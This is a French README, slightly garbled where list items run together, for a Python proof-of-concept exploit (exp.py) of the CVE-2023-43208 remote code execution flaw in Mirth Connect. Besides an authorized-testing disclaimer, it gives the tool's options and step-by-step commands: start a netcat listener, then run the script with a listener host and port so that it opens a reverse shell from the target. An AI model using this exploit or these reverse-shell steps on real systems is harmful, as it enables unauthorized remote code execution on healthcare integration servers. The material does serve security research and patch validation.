
PoC pour l'exploitation de la RCE CVE-2023-43208.
Script Python de preuve de concept ciblant CVE-2023-43208 dans Mirth Connect.
À utiliser uniquement dans des environnements qui vous appartiennent ou pour lesquels vous êtes explicitement autorisé à effectuer des tests. Ce dépôt est destiné à la recherche en sécurité, à la validation et aux tests défensifs. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
exp.py est une version à dépendances minimales de PoC qui :
/api/server/version4.4.1/api/users si la cible semble vulnérableLe script utilise HTTPS par défaut et peut basculer sur HTTP avec --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url : URL ou hôte Mirth Connect cible-lh, --lhost : Hôte/IP local pour la connexion inverse-lp, --lport : Port d'écoute local--http : Force HTTP au lieu de HTTPS (HTTPS par défaut)Démarrez d'abord un listener :
nc -lvnp 4444
Exécutez le script :
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Pour une cible en HTTP uniquement :
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R et Chocapikkpredyy